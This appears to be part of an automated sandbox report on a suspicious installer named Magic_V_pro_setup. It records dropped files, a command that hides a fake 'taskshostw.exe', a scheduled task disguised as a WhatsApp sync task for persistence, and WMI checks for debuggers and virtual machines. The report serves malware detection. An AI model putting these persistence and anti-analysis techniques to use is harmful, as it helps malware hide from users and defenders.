              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWindow found: window name: TMainFormJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeStatic PE information: certificate valid
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeStatic file information: File size 3548416 > 1048576
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: wntdll.pdbUGP source: taskshostw.exe, 00000011.00000002.1520638050.0000000004040000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: taskshostw.exe, 00000011.00000002.1520638050.0000000004040000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: f:\mydev\inno-download-plugin\unicode\idp.pdb source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240210545.0000000003610000.00000004.00001000.00020000.00000000.sdmp, idp.dll.1.dr, idp.dll.4.dr
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01078180 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_01078180
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeStatic PE information: section name: .didata
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.0.drStatic PE information: section name: .didata
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.drStatic PE information: section name: .didata
              Source: idp.exe.4.drStatic PE information: section name: .sxdata
              Source: willrandom.exe.10.drStatic PE information: section name: pb
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpCode function: 4_3_0092BE88 push cs; ret 4_3_0092BE8D
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpCode function: 4_3_0092B4B4 push eax; iretd 4_3_0092B4B5
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpCode function: 4_2_008A4AC7 pushad ; ret 4_2_008A4DC1
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpCode function: 4_2_008A581C pushad ; ret 4_2_008A581D
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpCode function: 4_2_008A4D2E pushad ; ret 4_2_008A4DC1
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_010950F0 push eax; ret 10_2_0109510E
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01095470 push eax; ret 10_2_0109549E
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0044D1FA push ebp; iretd 17_2_0044D291
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0044C9AE push edx; ret 17_2_0044C9AF
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00445EE0 push eax; mov dword ptr [esp], 2E29287Bh17_2_00445EE1
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0044D6FC pushad ; iretd 17_2_0044D6FD
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0044D700 push ebp; iretd 17_2_0044D701
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0044D708 pushad ; iretd 17_2_0044D709
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF1BF7 push dword ptr [esp+20h]; retn 0024h17_2_03FF1C1F
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF1BAF push dword ptr [esp+20h]; retn 0024h17_2_03FF1C1F
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF1B97 push dword ptr [esp+20h]; retn 0024h17_2_03FF1C1F
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF1B32 push ecx; ret 17_2_03FF1AD7
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF1B2A push dword ptr [esp+20h]; retn 0024h17_2_03FF1C1F
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF0ABA push ebx; ret 17_2_03FF0ABD
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF1ABA push ecx; ret 17_2_03FF1AD7
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF029C push dword ptr [esp+08h]; retn 000Ch17_2_03FF0299
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF0279 push dword ptr [esp+08h]; retn 000Ch17_2_03FF0299
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF0270 push dword ptr [esp+14h]; retn 0018h17_2_03FF0274
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF0259 push dword ptr [esp+08h]; retn 000Ch17_2_03FF0299
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF023D push dword ptr [esp+08h]; retn 000Ch17_2_03FF0299
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF0226 push eax; ret 17_2_03FF0278
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF016F push ecx; ret 17_2_03FF0189
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF0139 push ecx; ret 17_2_03FF06AC
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF18FA push ecx; ret 17_2_03FF1AD7
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF00EC push dword ptr [esp+08h]; retn 000Ch17_2_03FF0299
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_03FF0094 push ecx; ret 17_2_03FF0189
              Source: willrandom.exe.10.drStatic PE information: section name: CODE entropy: 7.216381671022325

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeFile created: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QC304.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeFile created: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpFile created: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QC304.tmp\idp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpFile created: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpFile created: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeFile created: C:\Users\user\AppData\Local\Programs\Common\willrandom.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PETOOLS.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="SYSANALYZER.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="HOOKEXPLORER.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ME="FILEMON.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PROC_ANALYZER.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="DUMPCAP.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="FIDDLER.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PROCESSHACKER.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="SNIFF_HIT.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="FILEMON.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="WIRESHARK.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="OLLYDBG.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="X64DBG.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="IDAQ.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="WINDBG.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="AUTORUNS.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="XENSERVICE.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="IMPORTREC.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ME="OLLYDBG.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PROCMON.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="REGMON.EXE");
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="AUTORUNSC.EXE");
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 22_2_03FB1FCB rdtsc 22_2_03FB1FCB
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QC304.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QC304.tmp\idp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeAPI coverage: 6.3 %
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp TID: 6488Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe TID: 7860Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe TID: 8156Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SEleCt * FrOm wIN32_CoMPuTeRsySteM
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_00FF6CE2 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00FF6CE2
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_00FF7904 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00FF7904
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_00FFA0D3 GetSystemInfo,10_2_00FFA0D3
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW+L
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.0000000000948000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Ven_NECVMWar&Prod_VMware_SA]~'9_
              Source: taskshostw.exe, 00000016.00000003.2037241269.0000000000814000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\E
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.0000000000746000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1497163107.0000000000741000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.0000000000747000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1515259411.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000847000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.000000000083D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
